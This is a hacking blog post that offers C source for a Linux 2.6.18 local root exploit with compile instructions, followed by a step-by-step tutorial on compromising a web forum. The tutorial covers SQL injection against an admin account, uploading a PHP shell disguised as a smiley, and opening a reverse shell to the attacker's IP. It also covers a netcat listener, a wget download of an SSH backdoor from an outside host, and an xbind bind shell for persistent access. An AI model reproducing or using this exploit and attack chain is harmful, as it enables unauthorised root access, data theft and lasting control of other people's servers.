2.6.18 2011 Local Root Exploit

Posted By Maher Bro


Local Roots are used to root the linux servers by their versions so here’s the Local root Exploit of 2.6.18 2011 100% working .
To get the local root in the Paste Click here to get

/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /’ \ __ /’__`\ /\ \__ /’__`\ 0
* 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
* 1 \/_/\ \ /’ _ `\ \/\ \/_/_\_<_ /’___\ \ \/\ \ \ \ \/\`’__\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
* 1 \ \____/ >> Exploit database separated by exploit 0
* 0 \/___/ type (local, remote, DoS, etc.) 1
* 1 0
* 0 By CrosS 1
* 1 0
* 0 Linux 2011 1
* 1 0
* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18-128.el5
* Linux 2.6.9-89.EL
* Ubuntu 8.10 Linux 2.6.27
*
* For i386 & ppc compile with the command;
* gcc -w -o exploit exploit.c
*
* For x86_64 kernel and ppc64 Compile as;
* gcc -w -m64 -o exploit exploit.c
*
* Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ….. & all members of r00tw0rm.com ( RW ) .. )
*
* Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com
*
* For Educational purpose Only))
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;
asm volatile (“movq %%rsp,%0; ” : “=r” (sp));
return sp;
}
#else
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;
asm volatile (“movl %%esp,%0″ : “=r” (sp));
return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;
asm volatile (“mr %0,%%r1; ” : “=r” (sp));
return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct;
asm volatile (“movq %%gs:(0),%0; ” : “=r” (task_struct));
return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct, thread_info;
thread_info = current_stack_pointer() & ~(4096 – 1);
if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;
/*
* The TASK_RUNNING is the Only poss1ble sta7e for a proCes5 exEcut1ng
* in us3r-spaCe.
*/
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}
/*
* Prior to the 2.6 kernel series, the task_struct was stored at the end
* of the kernel stack.
*/
task_struct = current_stack_pointer() & ~(8192 – 1);
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct, thread_info;
#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 – 1);
#else
task_struct = current_stack_pointer() & ~(8192 – 1);
#endif
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int
change_cred(****)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid &&
task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid &&
task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int
change_cred(****)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}
if (task_struct[0] == task_struct[1] &&
task_struct[0] == task_struct[2] &&
task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] &&
task_struct[4] == task_struct[6] &&
task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#endif
#define PAGE_SIZE getpagesize()
int
main(****)
{
char *addr;
int out_fd, in_fd;
char template[] = “/tmp/tmp.XXXXXX”;
#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();
#endif
if ((addr = mmap(NULL, 0×1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
perror(“mmap”);
exit(EXIT_FAILURE);
}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = ‘\xff’;
addr[1] = ‘\x24′;
addr[2] = ‘\x25′;
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
addr[0] = ‘\xff’;
addr[1] = ‘\x25′;
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
/*
* The use of function descriptors by the Power 64-bit ELF ABI requires
* the use of a fake function descriptor.:P
*/
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
addr[0] = ‘\x3f’;
addr[1] = ‘\xe0′;
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = ‘\x63′;
addr[5] = ‘\xff’;
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = ‘\x7f’;
addr[9] = ‘\xe9′;
addr[10] = ‘\x03′;
addr[11] = ‘\xa6′;
addr[12] = ‘\x4e’;
addr[13] = ‘\x80′;
addr[14] = ‘\x04′;
addr[15] = ‘\x20′;
#endif
#endif
if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
perror(“socket”);
exit(EXIT_FAILURE);
}
if ((in_fd = mkstemp(template)) == -1) {
perror(“mkstemp”);
exit(EXIT_FAILURE);
}
if(unlink(template) == -1) {
perror(“unlink”);
exit(EXIT_FAILURE);
}
if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror(“ftruncate”);
exit(EXIT_FAILURE);
}
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
execl(“/bin/sh”, “sh”, “-i”, NULL);
exit(EXIT_SUCCESS);
}

Just Copy the above code and Save it as anyname.c . I hope you will like it and don’t forget to share it .

Rooting Tutorial! (Exploiting and Rooting a Webserver from)

Scratch Complete Tutorial
Intro:

For todays tutorial we shall learn how to
exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.

1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access

Hacking a Forum Admin using Exploit to Gain,

Admin Access - Part 1:

As said earlier i'm going to exploit ipb v2.1 forum here. You can hack
other forums too using exploits or making own exploits (which is rare )

Tools Needed:

This has the shell and backdoor files along with MD5 HashCracking tool and
some other things.

Download:
Code:
http://depositfiles.com/files/9juskrtax

Gaining Admin Access:

For today i will be hacking an ipb 2.1 forum by gaining admin access and
then I will show you how to root the server.
First i will be using a perl exploit and gain admin access to the forum. Usually the admin id

is 1 maybe 0 or 2 sometimes.

Here it is this guy:

UserName: Kawool
UserId = 2

Next we extract the user hash and salt. Switch to cmd and execute the perl
exploit.

Then you should see this sql injection tool.
Change the forum index path, userid (of the admin), the table name.

After you click get data from database you should see this hash:
Then use converage pass salt option.

After you get the hash the next step to do is crack the salted hash. Since
it is ipb , cracking the hash will be a pain for sure.

Cracking the Hash:

I have provided passwords pro in the download above. It is a very efficient
tool to crack md5 hashes, even salted ones.

Now probably go to sleep or drink 4-5 cup of tea until the hash is cracked.

I got mine after sometime.

So now:

Code:
Username: Kawool

Password: *******
I'm gonna login as admin now ^^; Lets move on to the main part of gaining root access.

Uploading The Shell as Admin - Part 2:

Uploading a Shell:

Now that we have the admin access in our hand now is the part when we

upload a shell (For those who don't know what a shell is, It is a php script that gives

privilages to upload files on a website, mess with other files etc. And yeah allows to gain

root access too).

Uploading shell as smiley here.

In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.


Now lets browse our shell shall we..

w00t we has the shell uploaded properly.Next upload a c99 shell from this shell. Why we did

this is because c99 shells can be detected somwetimes. So the other shell is like a decoy.

Once its done we upload c99 shell.

Good shell was uploaded properly.

That does it for our 2nd part. Move on to Third.

Using the Shell to Gain Root Access - Part 3:

Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.

So i upload back.pl i provided in the file.

After thats done time to use the script.

For this we give the following code.

Code:
perl back.pl youripaddress

BEFORE we execute the script we need to start netcat and start listening to conenctions on

port 2121.

use netcat from my downloadfile, and use the command:

Code:
nc -vv -l -p 2121

Next we shall upload an exploit that will let us obtain root status on the server

Time to execute it.

Now we upload a backdoor for future access.

Type in the following command:
Code:
wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)
Now the following command:
Code:
tar -zxvf sshdoor.tgz
Then we make sshdoor the current directory using this code:
Code:
cd sshdoor
Then:
Code:
cat README
after you see the window with sang and prabu name. Execute the command:
Code:
.install yourpassword 2121
After thats done, we connect to the server via putty.

Err an Epic Fail has occured my friends.

Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win (actually hackers do O_O).

Now we upload xbind.c this should be over quickly. Remember the steps don't you?

Indeed its easy.

Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script):
Code:
gcc -o xbind xbind.c
Compile, run and connect.

Paste the following code now:
Code:
./xbind 1985
Switch to netcat again. and run the connection code (nc vv blah blha blah) to the ip.

Now enter teh password and get going.

Code:
uname -a
There you go, we now have future access to the server

That does it for our Rooting Server tutorial. Yeah i agree, Gaining root access is a pain but its worth the reward.

Tutorial Source